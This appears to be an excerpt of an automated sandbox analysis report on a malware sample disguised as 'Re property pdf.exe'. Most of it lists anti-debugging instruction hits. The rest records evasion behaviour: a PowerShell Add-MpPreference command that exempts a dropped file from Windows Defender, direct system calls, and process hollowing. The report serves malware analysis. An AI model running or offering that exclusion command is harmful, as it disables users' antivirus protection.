            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102245A mov eax, dword ptr fs:[00000030h]6_2_0102245A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010BA456 mov eax, dword ptr fs:[00000030h]6_2_010BA456
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108C460 mov ecx, dword ptr fs:[00000030h]6_2_0108C460
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102A470 mov eax, dword ptr fs:[00000030h]6_2_0102A470
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102A470 mov eax, dword ptr fs:[00000030h]6_2_0102A470
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102A470 mov eax, dword ptr fs:[00000030h]6_2_0102A470
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010BA49A mov eax, dword ptr fs:[00000030h]6_2_010BA49A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010064AB mov eax, dword ptr fs:[00000030h]6_2_010064AB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010344B0 mov ecx, dword ptr fs:[00000030h]6_2_010344B0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108A4B0 mov eax, dword ptr fs:[00000030h]6_2_0108A4B0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010004E5 mov ecx, dword ptr fs:[00000030h]6_2_010004E5
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C700 mov eax, dword ptr fs:[00000030h]6_2_0103C700
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01000710 mov eax, dword ptr fs:[00000030h]6_2_01000710
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01030710 mov eax, dword ptr fs:[00000030h]6_2_01030710
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C720 mov eax, dword ptr fs:[00000030h]6_2_0103C720
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C720 mov eax, dword ptr fs:[00000030h]6_2_0103C720
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107C730 mov eax, dword ptr fs:[00000030h]6_2_0107C730
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103273C mov eax, dword ptr fs:[00000030h]6_2_0103273C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103273C mov ecx, dword ptr fs:[00000030h]6_2_0103273C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103273C mov eax, dword ptr fs:[00000030h]6_2_0103273C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103674D mov esi, dword ptr fs:[00000030h]6_2_0103674D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103674D mov eax, dword ptr fs:[00000030h]6_2_0103674D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103674D mov eax, dword ptr fs:[00000030h]6_2_0103674D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01000750 mov eax, dword ptr fs:[00000030h]6_2_01000750
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042750 mov eax, dword ptr fs:[00000030h]6_2_01042750
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042750 mov eax, dword ptr fs:[00000030h]6_2_01042750
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108E75D mov eax, dword ptr fs:[00000030h]6_2_0108E75D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01084755 mov eax, dword ptr fs:[00000030h]6_2_01084755
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01008770 mov eax, dword ptr fs:[00000030h]6_2_01008770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A678E mov eax, dword ptr fs:[00000030h]6_2_010A678E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B47A0 mov eax, dword ptr fs:[00000030h]6_2_010B47A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010007AF mov eax, dword ptr fs:[00000030h]6_2_010007AF
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100C7C0 mov eax, dword ptr fs:[00000030h]6_2_0100C7C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010807C3 mov eax, dword ptr fs:[00000030h]6_2_010807C3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108E7E1 mov eax, dword ptr fs:[00000030h]6_2_0108E7E1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010227ED mov eax, dword ptr fs:[00000030h]6_2_010227ED
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010227ED mov eax, dword ptr fs:[00000030h]6_2_010227ED
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010227ED mov eax, dword ptr fs:[00000030h]6_2_010227ED
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010047FB mov eax, dword ptr fs:[00000030h]6_2_010047FB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010047FB mov eax, dword ptr fs:[00000030h]6_2_010047FB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101260B mov eax, dword ptr fs:[00000030h]6_2_0101260B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101260B mov eax, dword ptr fs:[00000030h]6_2_0101260B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101260B mov eax, dword ptr fs:[00000030h]6_2_0101260B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101260B mov eax, dword ptr fs:[00000030h]6_2_0101260B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101260B mov eax, dword ptr fs:[00000030h]6_2_0101260B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101260B mov eax, dword ptr fs:[00000030h]6_2_0101260B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101260B mov eax, dword ptr fs:[00000030h]6_2_0101260B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E609 mov eax, dword ptr fs:[00000030h]6_2_0107E609
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042619 mov eax, dword ptr fs:[00000030h]6_2_01042619
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01036620 mov eax, dword ptr fs:[00000030h]6_2_01036620
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01038620 mov eax, dword ptr fs:[00000030h]6_2_01038620
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101E627 mov eax, dword ptr fs:[00000030h]6_2_0101E627
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100262C mov eax, dword ptr fs:[00000030h]6_2_0100262C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101C640 mov eax, dword ptr fs:[00000030h]6_2_0101C640
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C866E mov eax, dword ptr fs:[00000030h]6_2_010C866E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C866E mov eax, dword ptr fs:[00000030h]6_2_010C866E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A660 mov eax, dword ptr fs:[00000030h]6_2_0103A660
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A660 mov eax, dword ptr fs:[00000030h]6_2_0103A660
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01032674 mov eax, dword ptr fs:[00000030h]6_2_01032674
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01004690 mov eax, dword ptr fs:[00000030h]6_2_01004690
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01004690 mov eax, dword ptr fs:[00000030h]6_2_01004690
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C6A6 mov eax, dword ptr fs:[00000030h]6_2_0103C6A6
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010366B0 mov eax, dword ptr fs:[00000030h]6_2_010366B0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A6C7 mov ebx, dword ptr fs:[00000030h]6_2_0103A6C7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A6C7 mov eax, dword ptr fs:[00000030h]6_2_0103A6C7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E6F2 mov eax, dword ptr fs:[00000030h]6_2_0107E6F2
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E6F2 mov eax, dword ptr fs:[00000030h]6_2_0107E6F2
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E6F2 mov eax, dword ptr fs:[00000030h]6_2_0107E6F2
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E6F2 mov eax, dword ptr fs:[00000030h]6_2_0107E6F2
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010806F1 mov eax, dword ptr fs:[00000030h]6_2_010806F1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010806F1 mov eax, dword ptr fs:[00000030h]6_2_010806F1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E908 mov eax, dword ptr fs:[00000030h]6_2_0107E908
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E908 mov eax, dword ptr fs:[00000030h]6_2_0107E908
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108C912 mov eax, dword ptr fs:[00000030h]6_2_0108C912
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108892A mov eax, dword ptr fs:[00000030h]6_2_0108892A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0109892B mov eax, dword ptr fs:[00000030h]6_2_0109892B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D4940 mov eax, dword ptr fs:[00000030h]6_2_010D4940
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01080946 mov eax, dword ptr fs:[00000030h]6_2_01080946
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01026962 mov eax, dword ptr fs:[00000030h]6_2_01026962
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01026962 mov eax, dword ptr fs:[00000030h]6_2_01026962
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01026962 mov eax, dword ptr fs:[00000030h]6_2_01026962
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0104096E mov eax, dword ptr fs:[00000030h]6_2_0104096E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0104096E mov edx, dword ptr fs:[00000030h]6_2_0104096E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0104096E mov eax, dword ptr fs:[00000030h]6_2_0104096E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A4978 mov eax, dword ptr fs:[00000030h]6_2_010A4978
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A4978 mov eax, dword ptr fs:[00000030h]6_2_010A4978
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108C97C mov eax, dword ptr fs:[00000030h]6_2_0108C97C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010009AD mov eax, dword ptr fs:[00000030h]6_2_010009AD
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010009AD mov eax, dword ptr fs:[00000030h]6_2_010009AD
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010889B3 mov esi, dword ptr fs:[00000030h]6_2_010889B3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010889B3 mov eax, dword ptr fs:[00000030h]6_2_010889B3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010889B3 mov eax, dword ptr fs:[00000030h]6_2_010889B3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010969C0 mov eax, dword ptr fs:[00000030h]6_2_010969C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A9D0 mov eax, dword ptr fs:[00000030h]6_2_0100A9D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A9D0 mov eax, dword ptr fs:[00000030h]6_2_0100A9D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A9D0 mov eax, dword ptr fs:[00000030h]6_2_0100A9D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A9D0 mov eax, dword ptr fs:[00000030h]6_2_0100A9D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A9D0 mov eax, dword ptr fs:[00000030h]6_2_0100A9D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A9D0 mov eax, dword ptr fs:[00000030h]6_2_0100A9D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010349D0 mov eax, dword ptr fs:[00000030h]6_2_010349D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CA9D3 mov eax, dword ptr fs:[00000030h]6_2_010CA9D3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108E9E0 mov eax, dword ptr fs:[00000030h]6_2_0108E9E0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010329F9 mov eax, dword ptr fs:[00000030h]6_2_010329F9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010329F9 mov eax, dword ptr fs:[00000030h]6_2_010329F9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108C810 mov eax, dword ptr fs:[00000030h]6_2_0108C810
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A483A mov eax, dword ptr fs:[00000030h]6_2_010A483A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A483A mov eax, dword ptr fs:[00000030h]6_2_010A483A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A830 mov eax, dword ptr fs:[00000030h]6_2_0103A830
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01022835 mov eax, dword ptr fs:[00000030h]6_2_01022835
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01022835 mov eax, dword ptr fs:[00000030h]6_2_01022835
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01022835 mov eax, dword ptr fs:[00000030h]6_2_01022835
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01022835 mov ecx, dword ptr fs:[00000030h]6_2_01022835
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01022835 mov eax, dword ptr fs:[00000030h]6_2_01022835
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01022835 mov eax, dword ptr fs:[00000030h]6_2_01022835
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01012840 mov ecx, dword ptr fs:[00000030h]6_2_01012840
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01030854 mov eax, dword ptr fs:[00000030h]6_2_01030854
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01004859 mov eax, dword ptr fs:[00000030h]6_2_01004859
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01004859 mov eax, dword ptr fs:[00000030h]6_2_01004859
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01096870 mov eax, dword ptr fs:[00000030h]6_2_01096870
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01096870 mov eax, dword ptr fs:[00000030h]6_2_01096870
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108E872 mov eax, dword ptr fs:[00000030h]6_2_0108E872
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108E872 mov eax, dword ptr fs:[00000030h]6_2_0108E872
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01000887 mov eax, dword ptr fs:[00000030h]6_2_01000887
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108C89D mov eax, dword ptr fs:[00000030h]6_2_0108C89D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E8C0 mov eax, dword ptr fs:[00000030h]6_2_0102E8C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D08C0 mov eax, dword ptr fs:[00000030h]6_2_010D08C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FF8918 mov eax, dword ptr fs:[00000030h]6_2_00FF8918
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FF8918 mov eax, dword ptr fs:[00000030h]6_2_00FF8918
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CA8E4 mov eax, dword ptr fs:[00000030h]6_2_010CA8E4
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C8F9 mov eax, dword ptr fs:[00000030h]6_2_0103C8F9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C8F9 mov eax, dword ptr fs:[00000030h]6_2_0103C8F9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D4B00 mov eax, dword ptr fs:[00000030h]6_2_010D4B00
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107EB1D mov eax, dword ptr fs:[00000030h]6_2_0107EB1D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107EB1D mov eax, dword ptr fs:[00000030h]6_2_0107EB1D
            Source: C:\Users\user\Desktop\Re property pdf.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Re property pdf.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Re property pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtUnmapViewOfSection: Direct from: 0x76F02D3C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\Re property pdf.exe | Memory written: C:\Users\user\Desktop\Re property pdf.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Re property pdf.exe | Section loaded: NULL target: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Re property pdf.exe | Section loaded: NULL target: C:\Windows\SysWOW64\PresentationHost.exe protection: execute and read and write
